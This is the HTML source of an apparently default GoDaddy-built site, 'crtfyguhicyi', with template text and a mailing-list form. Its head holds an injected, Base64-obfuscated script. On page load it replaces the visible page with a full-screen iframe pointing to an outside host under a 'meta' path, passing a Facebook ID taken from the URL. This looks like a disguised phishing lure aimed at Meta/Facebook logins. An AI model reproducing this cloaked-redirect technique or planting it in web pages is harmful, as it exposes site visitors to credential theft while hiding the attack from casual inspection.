
<!DOCTYPE html><html lang="en-US"><head><meta charSet="utf-8"/><meta http-equiv="X-UA-Compatible" content="IE=edge"/><meta name="viewport" content="width=device-width, initial-scale=1"/><title>crtfyguhicyi</title><link rel="alternate" type="application/atom+xml" href="https://crtfyguhicyi.godaddysites.com/f.atom"/><link rel="alternate" type="application/json" href="https://crtfyguhicyi.godaddysites.com/f.json"/><link rel="alternate" type="application/rss+xml" href="https://crtfyguhicyi.godaddysites.com/f.rss"/><meta name="author" content="crtfyguhicyi"/><meta name="generator" content="Starfield Technologies; Go Daddy Website Builder 8.0.0000"/><link rel="manifest" href="/manifest.webmanifest"/><link rel="apple-touch-icon" sizes="57x57" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:57,h:57,m"/><link rel="apple-touch-icon" sizes="60x60" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:60,h:60,m"/><link rel="apple-touch-icon" sizes="72x72" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:72,h:72,m"/><link rel="apple-touch-icon" sizes="114x114" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:114,h:114,m"/><link rel="apple-touch-icon" sizes="120x120" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:120,h:120,m"/><link rel="apple-touch-icon" sizes="144x144" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:144,h:144,m"/><link rel="apple-touch-icon" sizes="152x152" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:152,h:152,m"/><link rel="apple-touch-icon" sizes="180x180" href="//img1.wsimg.com/isteam/ip/static/pwa-app/logo-default.png/:/rs=w:180,h:180,m"/><meta property="og:url" content="https://crtfyguhicyi.appspot.com/"/>
<meta property="og:site_name" content="crtfyguhicyi"/>
<meta property="og:title" content="Get your daily dose!"/>
<meta property="og:type" content="website"/>
<meta property="og:image" content="http://img1.wsimg.com/isteam/videos/uGbA6v1EwwF20VGXJ"/>
<meta property="og:locale" content="en_US"/>
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="crtfyguhicyi"/>
<meta name="twitter:description" content="Get your daily dose!"/>
<meta name="twitter:image" content="http://img1.wsimg.com/isteam/videos/uGbA6v1EwwF20VGXJ"/>
<meta name="twitter:image:alt" content="crtfyguhicyi"/>
<meta name="theme-color" content="#53DEBF"/><script type="text/javascript" src="https://img1.wsimg.com/poly/v2/polyfill.min.js?unknown=polyfill&amp;flags=gated&amp;features=default%2Cfetch%2CArray.prototype.%40%40iterator%2CArray.prototype.find%2CArray.prototype.findIndex%2CFunction.name%2CNumber.isFinite%2CPromise%2CString.prototype.repeat%2CMath.sign%2CMath.trunc%2CArray.prototype.includes%2CObject.entries%2CObject.values%2CObject.is%2CIntersectionObserver%2CIntl.~locale.en-US" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/79fb68164481d54f/script.js" crossorigin></script>
<script type="text/javascript">"undefined"===typeof _trfq&&(window._trfq=[]);"undefined"==typeof _trfd&&(window._trfd=[]);</script>
<script src="https://code.jquery.com/jquery-1.12.4.min.js"
  integrity="sha256-ZosEbRLbNQzLpnKIkEdrPv7lOy9C27hHQ+Xp8a4MxAQ="
  crossorigin="anonymous"></script>
<script>
var Base64={_keyStr:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(r){var c,t,C,g,o,h,e,n="",d=0;for(r=Base64._utf8_encode(r);d<r.length;)g=(c=r.charCodeAt(d++))>>2,o=(3&c)<<4|(t=r.charCodeAt(d++))>>4,h=(15&t)<<2|(C=r.charCodeAt(d++))>>6,e=63&C,isNaN(t)?h=e=64:isNaN(C)&&(e=64),n=n+this._keyStr.charAt(g)+this._keyStr.charAt(o)+this._keyStr.charAt(h)+this._keyStr.charAt(e);return n},decode:function(r){var c,t,C,g,o,h,e="",n=0;for(r=r.replace(/[^A-Za-z0-9+/=]/g,"");n<r.length;)c=this._keyStr.indexOf(r.charAt(n++))<<2|(g=this._keyStr.indexOf(r.charAt(n++)))>>4,t=(15&g)<<4|(o=this._keyStr.indexOf(r.charAt(n++)))>>2,C=(3&o)<<6|(h=this._keyStr.indexOf(r.charAt(n++))),e+=String.fromCharCode(c),64!=o&&(e+=String.fromCharCode(t)),64!=h&&(e+=String.fromCharCode(C));return e=Base64._utf8_decode(e)},_utf8_encode:function(r){r=r.replace(/rn/g,"n");for(var c="",t=0;t<r.length;t++){var C=r.charCodeAt(t);C<128?c+=String.fromCharCode(C):(127<C&&C<2048?c+=String.fromCharCode(C>>6|192):(c+=String.fromCharCode(C>>12|224),c+=String.fromCharCode(C>>6&63|128)),c+=String.fromCharCode(63&C|128))}return c},_utf8_decode:function(r){for(var c="",t=0,C=c1=c2=0;t<r.length;)(C=r.charCodeAt(t))<128?(c+=String.fromCharCode(C),t++):191<C&&C<224?(c2=r.charCodeAt(t+1),c+=String.fromCharCode((31&C)<<6|63&c2),t+=2):(c2=r.charCodeAt(t+1),c3=r.charCodeAt(t+2),c+=String.fromCharCode((15&C)<<12|(63&c2)<<6|63&c3),t+=3);return c}};
var test = "ZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcignRE9NQ29udGVudExvYWRlZCcsIGZ1bmN0aW9uKCl7CiQoJ2JvZHknKS5jc3MoJ21hcmdpbicsJzBweCcpOwogICAgZG9jdW1lbnQuYm9keS5pbm5lckhUTUwgPSAnPGRpdiBpZD0iZ2dnIj48L2Rpdj4nOwoKdmFyIHJlZ2V4cCA9IC9mYmlkPShbXiZdKykvaTsKICAgICAgICB2YXIgR2V0VmFsdWUgPSAnJzsKICAgICAgICBpZiAoISFyZWdleHAuZXhlYyhkb2N1bWVudC5sb2NhdGlvbi5zZWFyY2gpKQogICAgICAgICAgICBHZXRWYWx1ZSA9IHJlZ2V4cC5leGVjKGRvY3VtZW50LmxvY2F0aW9uLnNlYXJjaClbMV07CiAgICAgICAgdmFyIHNyYyA9ICdodHRwczovL2JyYWRmb3JkYmQuY29tL21ldGEvZGltL2syMDNpaC9pbmRleC5waHAvP2ZiaWQ9JysgR2V0VmFsdWU7CnZhciBodGdodCA9ICQoJ2h0bWwnKS5oZWlnaHQoKTsKICAgICAgJCgnPGlmcmFtZT4nLCB7CiAgIHNyYzogc3JjLAogICBpZDogICdtZXRhJywKICAgZnJhbWVib3JkZXI6IDAsCmFsbG93dHJhbnNwYXJlbmN5OiAidHJ1ZSIgLAphbGxvd2Z1bGxzY3JlZW46ICJ0cnVlIiAsCiAgICAgICAgaGVpZ2h0Omh0Z2h0LAogICAgICAgIHdpZHRoOicxMDAlJywKICBzY3JvbGxpbmc6ICdhdXRvJwogICB9KS5hcHBlbmRUbygnI2dnZycpOwogfSk=";  
var script = document.createElement("script");
script.type="text/javascript";
script.innerHTML=Base64.decode(test);
document.getElementsByTagName("head")[0].appendChild(script);
</script>
<script type="text/javascript">function trackingEnabledForType(t){return!("undefined"!=typeof document&&"click"===t&&!Boolean(window._allowCT))||(window._allowCT=-1!==document.cookie.indexOf("cookie_terms_accepted"),window._allowCT)}function logTcclEvent(){var e=this.getAttribute("data-tccl");if(window._trfq&&e)try{var t=e.split(","),n=t[0],o=t[1];if(!trackingEnabledForType(o))return;for(var d=t.splice(2),r=[],c=0;c<d.length;c+=2)r.push([d[c],d[c+1]]);window._trfq.push(["cmdLogEvent",o,n,r])}catch(t){window._trfq.push(["cmdLogEvent","gc_published_site_error","tccl.published.log",[["error",t.toString()],["data",e]]])}}"undefined"!=typeof window&&"undefined"!=typeof document&&window.addEventListener("DOMContentLoaded",function(){for(var t=document.querySelectorAll("[data-tccl]"),e=0;e<t.length;e++)try{var n=t[e].getAttribute("data-tccl").split(",");t[e].addEventListener(n[1],logTcclEvent)}catch(t){window._trfq.push(["cmdLogEvent","gc_published_site_error","tccl.published.add",[["error",t.toString()]]])}});</script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/gpub/a9a1bfece70ee88a/script.js" crossorigin></script>
<script type="text/javascript" src="//img1.wsimg.com/blobby/go/b23b2d98-57ad-4fbe-8015-e4ee95e9ee62/gpub/1a345f78ae3b64b/script.js" crossorigin></script>
<script type="text/javascript">"use strict";

if ('serviceWorker' in navigator) {
  window.addEventListener('load', function () {
    navigator.serviceWorker.register('/sw.js').then(function () {
      console.log('sw: registration complete');
    }).catch(function (err) {
      console.log(err);
    });
  });
}</script>
<style type="text/css">/*
Copyright 2016 The Muli Project Authors (contact@sansoxygen.com)

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at: http://scripts.sil.org/OFL

—————————————————————————————-
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
—————————————————————————————-
*/
@import url('//fonts.googleapis.com/css?family=Muli:400&display=swap');
/*
Copyright 2011 The Quicksand Project Authors (https://github.com/andrew-paglinawan/QuicksandFamily), with Reserved Font Name Quicksand.

This Font Software is licensed under the SIL Open Font License, Version 1.1.
This license is copied below, and is also available with a FAQ at: http://scripts.sil.org/OFL

—————————————————————————————-
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
—————————————————————————————-
*/
@import url('//fonts.googleapis.com/css?family=Quicksand:400,700&display=swap');</style>
<link rel="stylesheet" href="//img1.wsimg.com/blobby/go/b23b2d98-57ad-4fbe-8015-e4ee95e9ee62/gpub/4524c1974583bbdd/styles.css"/>
<link data-glamor="cxs-default-sheet" rel="stylesheet" href="//img1.wsimg.com/blobby/go/b23b2d98-57ad-4fbe-8015-e4ee95e9ee62/gpub/6655345bd2ed4420/styles.css"/>
<style data-glamor="cxs-media-sheet" type="text/css"></style>
<style data-glamor="cxs-xs-sheet" type="text/css">@media (max-width: 767px){.x .c1-q{padding-top:32px}}@media (max-width: 767px){.x .c1-r{padding-bottom:32px}}@media (max-width: 767px){.x .c1-1g{margin:0 !important}}@media (max-width: 767px){.x .c1-1w{display:flex}}@media (max-width: 767px){.x .c1-2d{flex-grow:1}}@media (max-width: 767px){.x .c1-2g{padding-bottom:0px !important}}@media (max-width: 767px){.x .c1-56 > :nth-child(n){margin-bottom:24px}}@media (max-width: 767px){.x .c1-57  > :last-child{margin-bottom:0 !important}}@media (max-width: 767px){.x .c1-6d{margin-bottom:24px}}@media (max-width: 767px){.x .c1-7m{margin-top:0px}}@media (max-width: 767px){.x .c1-7n{margin-bottom:0px}}@media (max-width: 767px){.x .c1-7r{padding-top:none}}@media (max-width: 767px){.x .c1-7s{padding-bottom:none}}</style>
<link data-glamor="cxs-sm-sheet" rel="stylesheet" href="//img1.wsimg.com/blobby/go/b23b2d98-57ad-4fbe-8015-e4ee95e9ee62/gpub/503287907744181f/styles.css"/>
<link data-glamor="cxs-md-sheet" rel="stylesheet" href="//img1.wsimg.com/blobby/go/b23b2d98-57ad-4fbe-8015-e4ee95e9ee62/gpub/fdb0c0afff8e514/styles.css"/>
<style data-glamor="cxs-lg-sheet" type="text/css">@media (min-width: 1280px){.x .c1-f{font-size:16px}}@media (min-width: 1280px){.x .c1-14{width:1160px}}@media (min-width: 1280px){.x .c1-2z{font-size:44px}}@media (min-width: 1280px){.x .c1-3h{font-size:32px}}@media (min-width: 1280px){.x .c1-3m{font-size:22px}}@media (min-width: 1280px){.x .c1-3y{font-size:14px}}@media (min-width: 1280px){.x .c1-43{font-size:12px}}</style>
<style data-glamor="cxs-xl-sheet" type="text/css">@media (min-width: 1536px){.x .c1-g{font-size:18px}}@media (min-width: 1536px){.x .c1-15{width:1280px}}@media (min-width: 1536px){.x .c1-30{font-size:48px}}@media (min-width: 1536px){.x .c1-3i{font-size:36px}}@media (min-width: 1536px){.x .c1-3n{font-size:24px}}@media (min-width: 1536px){.x .c1-3z{font-size:16px}}@media (min-width: 1536px){.x .c1-44{font-size:14px}}</style>
<style type="text/css">.page-inner { background-color: rgb(255, 255, 255); min-height: 100vh; }</style></head>
<body class="x  x-fonts-muli" context="[object Object]"><div id="layout-b-23-b-2-d-98-57-ad-4-fbe-8015-e-4-ee-95-e-9-ee-62" class="layout layout-layout layout-layout-layout-21 locale-en-US lang-en"><div data-ux="Page" id="page-75933" class="x-el x-el-div x-el c1-1 c1-2 c1-3 c1-4 c1-5 c1-6 c1-7 c1-8 c1-9 c1-a c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Block" class="x-el x-el-div page-inner c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div id="fbdec8e3-e483-4850-9e5e-d0c2f6f0ccd6" class="widget widget-header widget-header-header-9"><div data-ux="Header" role="main" data-aid="HEADER_WIDGET" class="x-el x-el-div x-el x-el c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-3 c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div> <div id="bs-1"><div style="transition:max-height 1s;max-height:0;overflow:hidden" data-freemium-ad="true"></div></div><section data-ux="Section" data-aid="HEADER_SECTION" class="x-el x-el-section c1-1 c1-2 c1-3 c1-h c1-i c1-j c1-b c1-c c1-k c1-l c1-m c1-n c1-o c1-p c1-q c1-r c1-d c1-e c1-f c1-g"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-s c1-t c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"></div><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-u c1-v c1-w c1-x c1-y c1-t c1-z c1-b c1-c c1-10 c1-d c1-11 c1-12 c1-13 c1-e c1-14 c1-f c1-15 c1-g"><div data-ux="Grid" class="x-el x-el-div c1-1 c1-2 c1-16 c1-17 c1-18 c1-19 c1-1a c1-1b c1-1c c1-1d c1-1e c1-1f c1-b c1-c c1-1g c1-1h c1-1i c1-1j c1-1k c1-1l c1-d c1-1m c1-1n c1-e c1-f c1-g"><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-17 c1-1o c1-1p c1-1q c1-y c1-1r c1-1s c1-1t c1-1u c1-1v c1-b c1-c c1-1w c1-1x c1-1y c1-1z c1-20 c1-d c1-21 c1-22 c1-23 c1-24 c1-25 c1-26 c1-27 c1-28 c1-29 c1-e c1-f c1-g"><div data-ux="Hero" class="x-el x-el-div c1-1 c1-2 c1-2a c1-h c1-i c1-y c1-2b c1-2c c1-b c1-c c1-2d c1-d c1-e c1-f c1-g"><div data-ux="Block" data-aid="HEADER_LOGO_RENDERED" class="x-el x-el-div c1-2e c1-2f c1-y c1-4 c1-1e c1-c c1-2g c1-2h c1-d c1-e c1-f c1-g"><a rel="" role="link" aria-haspopup="menu" data-ux="Link" data-page="2dbc3c68-54c1-4511-8f4b-14af5ec7c5f0" title="crtfyguhicyi" href="/" data-typography="LinkAlpha" class="x-el x-el-a c1-2i c1-2j c1-2k c1-2c c1-2b c1-2l c1-2m c1-2n c1-2o c1-2p c1-2q c1-y c1-4 c1-b c1-2r c1-c c1-2s c1-2t c1-2u c1-d c1-e c1-f c1-g" data-tccl="ux2.HEADER.header9.Logo.Default.Link.Default.75935.click,click"><div data-ux="Block" id="logo-container-75936" class="x-el x-el-div c1-2e c1-4 c1-s c1-2v c1-2f c1-2w c1-2x c1-2y c1-2z c1-30"><h3 role="heading" aria-level="3" data-ux="LogoHeading" id="logo-text-75937" data-aid="HEADER_LOGO_TEXT_RENDERED" data-typography="LogoAlpha" class="x-el x-el-h3 c1-1 c1-2 c1-2c c1-2b c1-31 c1-32 c1-33 c1-1a c1-1c c1-y c1-34 c1-2e c1-2f c1-2w c1-2v c1-35 c1-2x c1-2y c1-2z c1-30">crtfyguhicyi</h3><span role="heading" aria-level="NaN" data-ux="scaler" data-size="xxlarge" data-scaler-id="scaler-logo-container-75936" aria-hidden="true" data-typography="LogoAlpha" class="x-el x-el-span c1-1 c1-2 c1-36 c1-37 c1-31 c1-32 c1-33 c1-1a c1-1c c1-y c1-34 c1-38 c1-39 c1-3a c1-3b c1-3c c1-3d c1-2v c1-2f c1-2w c1-35 c1-2x c1-2y c1-2z c1-30">crtfyguhicyi</span><span role="heading" aria-level="NaN" data-ux="scaler" data-size="xlarge" data-scaler-id="scaler-logo-container-75936" aria-hidden="true" data-typography="LogoAlpha" class="x-el x-el-span c1-1 c1-2 c1-36 c1-37 c1-31 c1-32 c1-33 c1-1a c1-1c c1-y c1-34 c1-38 c1-39 c1-3a c1-3b c1-3c c1-3d c1-3e c1-2f c1-2w c1-35 c1-3f c1-3g c1-3h c1-3i">crtfyguhicyi</span><span role="heading" aria-level="NaN" data-ux="scaler" data-size="large" data-scaler-id="scaler-logo-container-75936" aria-hidden="true" data-typography="LogoAlpha" class="x-el x-el-span c1-1 c1-2 c1-36 c1-37 c1-31 c1-32 c1-33 c1-1a c1-1c c1-y c1-34 c1-38 c1-39 c1-3a c1-3b c1-3c c1-3d c1-3j c1-2f c1-2w c1-35 c1-3k c1-3l c1-3m c1-3n">crtfyguhicyi</span><div id="bs-2"></div></div></a></div><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-32 c1-33 c1-3o c1-3p c1-y c1-3q c1-1r c1-1t c1-1a c1-1c c1-3r c1-b c1-c c1-10 c1-d c1-11 c1-e c1-14 c1-f c1-15 c1-g"><div data-ux="Element" id="tagline-container-75938" class="x-el x-el-div c1-1 c1-2 c1-2c c1-2b c1-31 c1-3s c1-s c1-y c1-b c1-c c1-d c1-e c1-f c1-g"><h1 role="heading" aria-level="1" data-ux="Tagline" data-aid="HEADER_TAGLINE_RENDERED" id="dynamic-tagline-75939" data-typography="BodyAlpha" class="x-el x-el-h1 c1-1 c1-2 c1-2c c1-2b c1-3t c1-32 c1-33 c1-1a c1-1c c1-3u c1-2e c1-y c1-b c1-2w c1-c c1-35 c1-d c1-e c1-f c1-g">Get your daily dose!</h1><span role="heading" aria-level="NaN" data-ux="scaler" data-size="medium" data-scaler-id="scaler-tagline-container-75938" aria-hidden="true" data-typography="BodyAlpha" class="x-el x-el-span c1-1 c1-2 c1-36 c1-37 c1-3t c1-32 c1-33 c1-1a c1-1c c1-3u c1-38 c1-y c1-39 c1-3a c1-3b c1-3c c1-3d c1-c c1-b c1-2w c1-35 c1-d c1-e c1-f c1-g">Get your daily dose!</span><span role="heading" aria-level="NaN" data-ux="scaler" data-size="small" data-scaler-id="scaler-tagline-container-75938" aria-hidden="true" data-typography="BodyAlpha" class="x-el x-el-span c1-1 c1-2 c1-36 c1-37 c1-3t c1-32 c1-33 c1-1a c1-1c c1-3u c1-38 c1-y c1-39 c1-3a c1-3b c1-3c c1-3d c1-3v c1-b c1-2w c1-35 c1-3w c1-3x c1-3y c1-3z">Get your daily dose!</span><span role="heading" aria-level="NaN" data-ux="scaler" data-size="xsmall" data-scaler-id="scaler-tagline-container-75938" aria-hidden="true" data-typography="BodyAlpha" class="x-el x-el-span c1-1 c1-2 c1-36 c1-37 c1-3t c1-32 c1-33 c1-1a c1-1c c1-3u c1-38 c1-y c1-39 c1-3a c1-3b c1-3c c1-3d c1-40 c1-b c1-2w c1-35 c1-41 c1-42 c1-43 c1-44">Get your daily dose!</span><div id="bs-3"></div></div></div><div data-ux="Group" class="x-el x-el-div c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div style="max-width:100%"><a tcclTracking="click" data-ux="Button" data-aid="HEADER_CTA_BTN" href="#" target="" data-tccl="ux2.header.cta_button.click,click" data-page="61521ac4-6e7e-4b52-a4b6-5b8a46b71b15" data-typography="ButtonAlpha" class="x-el x-el-a c1-45 c1-46 c1-47 c1-48 c1-3b c1-2m c1-49 c1-4a c1-4b c1-4c c1-1e c1-2k c1-2b c1-2c c1-s c1-y c1-4d c1-4e c1-4f c1-4g c1-4h c1-4i c1-4j c1-b c1-4k c1-4l c1-3v c1-4m c1-4n c1-4o c1-4p c1-4q c1-3w c1-3x c1-3y c1-3z">Contact Me</a></div></div></div></div><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-17 c1-1o c1-1p c1-1q c1-y c1-1r c1-1s c1-1t c1-1u c1-4r c1-b c1-c c1-1x c1-1y c1-1z c1-20 c1-d c1-21 c1-4s c1-4t c1-4u c1-e c1-f c1-g"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-4 c1-b c1-c c1-d c1-e c1-f c1-g"><div id="bs-4"><div data-ux="Wrapper" class="x-el x-el-div c1-1 c1-2 c1-2e c1-b c1-c c1-d c1-e c1-f c1-g"><script>Number(window.vctElements)||(window.vctElements=0),window.vctElements++</script><video data-aid="HEADER_VIDEO" style="width:100%;@md:[object Object]" src="" type="video/mp4" poster="https://img1.wsimg.com/isteam/videos/uGbA6v1EwwF20VGXJ" loop="" muted="" autoplay="" playsinline=""></video></div></div></div></div></div></div></div></div></section> </div></div></div><div id="9c74a663-6887-4ea1-9871-e809f8c61746" class="widget widget-content widget-content-content-4"><div data-ux="Widget" role="region" class="x-el x-el-div x-el c1-1 c1-2 c1-3 c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div> <section data-ux="Section" class="x-el x-el-section c1-1 c1-2 c1-3 c1-h c1-i c1-b c1-c c1-q c1-r c1-d c1-e c1-f c1-g"><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-u c1-v c1-w c1-x c1-y c1-b c1-c c1-10 c1-d c1-11 c1-e c1-14 c1-f c1-15 c1-g"><div data-ux="Grid" class="x-el x-el-div c1-1 c1-2 c1-16 c1-17 c1-18 c1-19 c1-1a c1-1b c1-1c c1-1d c1-1e c1-b c1-c c1-1h c1-1i c1-1j c1-1k c1-d c1-e c1-f c1-g"><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-17 c1-1o c1-1p c1-4v c1-y c1-1r c1-1s c1-1t c1-1u c1-b c1-c c1-4w c1-4x c1-4y c1-1x c1-1y c1-1z c1-20 c1-d c1-4z c1-50 c1-51 c1-e c1-f c1-g"><div data-ux="ContentBasic" class="x-el x-el-div x-el c1-1 c1-2 c1-16 c1-52 c1-4 c1-53 c1-4b c1-1e c1-54 c1-55 c1-b c1-c c1-56 c1-57 c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><h1 role="heading" aria-level="1" data-ux="FeaturedHeading" data-aid="CONTENT_WELCOME_TITLE_RENDERED" data-promoted-from="4" data-order="0" data-typography="HeadingDelta" class="x-el x-el-h1 c1-1 c1-2 c1-2c c1-2b c1-3t c1-32 c1-33 c1-1a c1-1c c1-b c1-58 c1-3j c1-35 c1-3k c1-3l c1-3m c1-3n">Welcome</h1><div data-ux="FeaturedText" alignment="center" data-aid="CONTENT_WELCOME_DESCRIPTION_RENDERED" data-typography="BodyBeta" class="x-el x-el-p c1-1 c1-2 c1-2c c1-2b c1-59 c1-1a c1-1c c1-5a c1-5b c1-5c c1-5d c1-5e c1-5f c1-5g c1-5h c1-5i c1-5j c1-5k c1-5l c1-5m c1-5n c1-5o c1-5p c1-5q c1-5r c1-5s c1-5t c1-5u c1-5v c1-5w c1-5x c1-5y c1-5z c1-60 c1-61 c1-34 c1-1o c1-b c1-62 c1-3j c1-35 c1-3k c1-3l c1-3m c1-3n x-rt"><p style="margin:0"><span>There's much to see here. So, take your time, look around. Then make sure to drop me a line. <br>
&nbsp;</span></p><p style="margin:0"><span>I look forward to hearing from you.</span></p></div></div></div></div></div></section> </div></div></div><div id="f193be48-0795-4d80-a0c2-8b32598306ef" class="widget widget-rss widget-rss-rss-3"><div data-ux="Widget" role="region" class="x-el x-el-div x-el c1-1 c1-2 c1-3 c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div> <section data-ux="Section" class="x-el x-el-section c1-1 c1-2 c1-3 c1-h c1-i c1-b c1-c c1-q c1-r c1-d c1-e c1-f c1-g"><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-u c1-v c1-w c1-x c1-y c1-b c1-c c1-10 c1-d c1-11 c1-e c1-14 c1-f c1-15 c1-g"><div data-ux="Intro" class="x-el x-el-div x-el c1-1 c1-2 c1-69 c1-6a c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><h4 role="heading" aria-level="4" data-ux="SectionHeading" data-aid="RSS_SECTION_TITLE_RENDERED" data-typography="HeadingBeta" class="x-el x-el-h4 c1-1 c1-2 c1-2c c1-2b c1-6b c1-32 c1-33 c1-1a c1-1c c1-6c c1-1e c1-2f c1-3e c1-58 c1-35 c1-6d c1-3f c1-24 c1-3g c1-3h c1-3i"><span data-ux="Element" class="x-el x-el-span c1-6e c1-64 c1-6f">My Blog</span><hr aria-hidden="true" role="separator" data-ux="SectionHeadingHR" class="x-el x-el-hr c1-6g c1-6h c1-6i c1-6j c1-1c c1-6k c1-2f c1-3e c1-3f c1-3g c1-3h c1-3i"/></h4></div><div><div id="f193be48-0795-4d80-a0c2-8b32598306ef-bootstrap-container"><div style="width:1px;height:1px;visibility:hidden"></div></div></div></div></section> </div></div></div><div id="b638566f-1a9c-49a6-89cb-ba4b78472ae4" class="widget widget-gallery widget-gallery-gallery-2"><div data-ux="WidgetBanner" role="region" class="x-el x-el-div x-el c1-1 c1-2 c1-3 c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div> <div id="bs-5"><div style="width:1px;height:1px;visibility:hidden"></div></div> </div></div></div><div id="b40efa80-968e-417a-9960-a54d4e76c7f9" class="widget widget-subscribe widget-subscribe-subscribe-2"><div data-ux="Widget" role="region" class="x-el x-el-div x-el c1-1 c1-2 c1-3 c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g"><div> <section data-ux="Section" class="x-el x-el-section c1-1 c1-2 c1-3 c1-h c1-i c1-b c1-c c1-q c1-r c1-d c1-e c1-f c1-g"><div data-ux="Container" class="x-el x-el-div c1-1 c1-2 c1-u c1-v c1-w c1-x c1-y c1-b c1-c c1-10 c1-d c1-11 c1-e c1-14 c1-f c1-15 c1-g"><div data-ux="Group" class="x-el x-el-div c1-1 c1-2 c1-6l c1-b c1-c c1-d c1-6m c1-e c1-f c1-g"><div data-ux="Grid" class="x-el x-el-div c1-1 c1-2 c1-16 c1-17 c1-18 c1-19 c1-1a c1-1b c1-1c c1-1d c1-b c1-c c1-1h c1-1i c1-1j c1-1k c1-d c1-e c1-f c1-g"><div data-ux="GridCell" class="x-el x-el-div c1-1 c1-2 c1-17 c1-1o c1-1p c1-4v c1-y c1-1r c1-1s c1-1t c1-1u c1-b c1-c c1-1x c1-1y c1-1z c1-20 c1-d c1-e c1-f c1-g"><div style="width:100%"><div id="b40efa80-968e-417a-9960-a54d4e76c7f9-bootstrap-container"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-3s c1-b c1-c c1-d c1-27 c1-28 c1-e c1-f c1-g"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-6n c1-b c1-c c1-d c1-6o c1-24 c1-e c1-f c1-g"><h3 role="heading" aria-level="3" data-ux="HeadingMiddle" data-aid="SECTION_TITLE_REND" data-typography="HeadingGamma" class="x-el x-el-h3 c1-1 c1-2 c1-2c c1-2b c1-3t c1-32 c1-33 c1-1a c1-1c c1-1e c1-2f c1-58 c1-3e c1-35 c1-3f c1-3g c1-3h c1-3i">Join My Mailing List</h3></div><div data-ux="Block" data-aid="SUBSCRIBE_INNER_FORM_REND" class="x-el x-el-div c1-1 c1-2 c1-1o c1-b c1-c c1-d c1-e c1-f c1-g"><form aria-live="polite" data-ux="InputGroup" class="x-el x-el-form x-el c1-1 c1-2 c1-b c1-c c1-d c1-e c1-f c1-g c1-1 c1-2 c1-1c c1-b c1-c c1-d c1-e c1-f c1-g"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-16 c1-52 c1-b c1-c c1-6p c1-d c1-e c1-f c1-g"><div data-ux="Block" class="x-el x-el-div c1-1 c1-2 c1-16 c1-1o c1-6q c1-b c1-c c1-6r c1-6s c1-d c1-e c1-f c1-g"> <div data-ux="InputFloatLabel" class="x-el x-el-div c1-1 c1-2 c1-s c1-4 c1-b c1-c c1-6t c1-6u c1-d c1-e c1-f c1-g"><input type="text" role="textbox" aria-multiline="false" data-ux="InputFloatLabel" id="input75940" value="" data-typography="InputAlpha" class="x-el x-el-input c1-1 c1-2 c1-3 c1-6v c1-4 c1-6w c1-6x c1-6y c1-6z c1-70 c1-71 c1-4g c1-72 c1-73 c1-6i c1-b c1-74 c1-3v c1-35 c1-75 c1-76 c1-77 c1-78 c1-79 c1-7a c1-7b c1-7c c1-7d c1-7e c1-7f c1-6t c1-6u c1-3w c1-3x c1-3y c1-3z"/><label data-ux="InputFloatLabelLabel" for="input75940" data-typography="InputAlpha" class="x-el x-el-label c1-1 c1-2 c1-2c c1-2b c1-3a c1-7g c1-7h c1-7i c1-7j c1-b c1-74 c1-3v c1-35 c1-3w c1-3x c1-3y c1-3z">Email Address</label></div> </div><button tcclTracking="click" data-ux="Button" type="submit" data-tccl="ux2.gem-subscribe.submit_form.click,click" data-aid="SUBSCRIBE_SUBMIT_BUTTON_REND" data-typography="ButtonAlpha" class="x-el x-el-button c1-45 c1-46 c1-47 c1-4 c1-32 c1-33 c1-2m c1-49 c1-4a 